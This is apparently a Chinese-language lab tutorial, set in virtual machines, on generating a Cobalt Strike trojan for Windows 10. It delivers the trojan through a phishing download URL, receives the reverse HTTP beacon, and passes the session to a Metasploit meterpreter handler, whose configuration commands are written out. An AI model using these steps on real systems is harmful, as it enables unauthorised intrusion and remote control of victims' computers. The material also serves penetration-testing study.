一、测试环境
操作系统:
1.VMware17
2.kali 6.1.0-kali5-amd64
3.Win10x64
软件:
1.cs4.0
2.metasploit v6.3.4-dev
二、测试思路
1.cs是一款渗透测试工具,但没有漏洞利用的模块,我们可以在拿到目标主机的权限后,将权限转移给msf,再进行漏洞利用。
三、测试流程
1.启动cs
这两步需要在不同终端进行
本机地址和你设置的密码
![](https://img-blog.csdnimg.cn/direct/fcd862f4d99948aab8f322643724c9e7.png)
打开cs
![](https://img-blog.csdnimg.cn/direct/391f4f91fb994e7e96e2a0f1c12f79cf.png)
这里主机名为自己的地址,密码为刚才设定的密码,其他默认
![](https://img-blog.csdnimg.cn/direct/0630034e4e3542a5b79960b3993d2124.png)
看到此页面就下载成功
![](https://img-blog.csdnimg.cn/direct/5b1e9d4565f24817a24e328a90d1e0dd.png)
2.渗透目的主机
1.设置监听器
点击耳机
![](https://img-blog.csdnimg.cn/direct/c34404adc0464608b66f909179de1d85.png)
配置监听器,beacon http(反向连接),两个http主机都填写本地ip地址,选择一个不冲突的端口号,点击保存。
![](https://img-blog.csdnimg.cn/direct/7fe53bcba4904ae1821bf6ecd060d5c5.png)
2.生成木马
选择边栏上的攻击,我们攻击Win10,选择此类型木马。
![](https://img-blog.csdnimg.cn/direct/2c29bc3545bc4a7387932255f2fb68d6.png)
选择我们刚刚创建的监听器,并使用x64的payload,点击生成,建议保存到tmp中
![](https://img-blog.csdnimg.cn/direct/bbdb01d3d9404cfd9dd07ce6d15ad568.png)
为了将木马注入对方主机,我们使用钓鱼url下载
![](https://img-blog.csdnimg.cn/direct/45480e36304b43abb12dea991208fb82.png)
选择我们刚才生成的木马,注意:一些电脑可能运行不了ext格式的文件,我们需要将url中的ext改为exe,根据自己需求决定,file.ext就是目标主机下载的木马程序。点击开始
![](https://img-blog.csdnimg.cn/direct/d09dcfabac9d4c278bedb8e530d3f54f.png)
会生成一个钓鱼URL
![](https://img-blog.csdnimg.cn/direct/345727acb2ba4ea9a0bb40f3633bf9a9.png)
3.在目标主机访问此URL
输入后自动下载木马程序(前提关闭系统防火墙和杀毒软件)
![](https://img-blog.csdnimg.cn/direct/b4a592edb805428892b359d250e188ce.png)
运行此木马程序后,我们可以在cs上发现此主机已经上线
![](https://img-blog.csdnimg.cn/direct/408b361b1d654bbb9040e9199f330a4a.png)
右键上线的主机,进入beacon会话,输入sleep 0,使主机直接回复
![](https://img-blog.csdnimg.cn/direct/86e55746d7cc462699daa988935ac0b9.png)
测试是否成功
![](https://img-blog.csdnimg.cn/direct/52f4e9b0421845a0b828acc46c218422.png)
![](https://img-blog.csdnimg.cn/direct/fa4c9962dcb34b159ca5ba3f247b744f.png)
3.将cs的权限传递给msf
1.在cs新建一个监听器
记住名字,使用Foreign外部http,输入本机ip地址及一个不冲突的端口,点击保存。
![](https://img-blog.csdnimg.cn/direct/9d4a2a432613445e97e4a8b496726cbf.png)
2.msf连接cs
使用msf中这此模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 本地ip
set lport 刚才新建cs监听器的端口号
![](https://img-blog.csdnimg.cn/direct/1251adabfcc0488bb88bff17c622e950.png)
输入run或者exploit开始运行
会出现这样一句话
![](https://img-blog.csdnimg.cn/direct/336a01f40197436f901a0314f4c14034.png)
返回cs,右键目标主机选择增添对话,选择我们新创建的监听器msf,点击choose
![](https://img-blog.csdnimg.cn/direct/4c89af6a9c7748798c035c9670a8a1d6.png)
回到msf,我们会发现权限传递成功
出现此界面就代表传递成功,若不成功就反复增添会话和msf运行这两个步骤。
![](https://img-blog.csdnimg.cn/direct/39c5a24b6d7b4b1db127521fa73795cc.png)
测试是否能使用此权限
乱码为msf版本编码问题
![](https://img-blog.csdnimg.cn/direct/514a129451de4d88acea005e12cdd06c.png)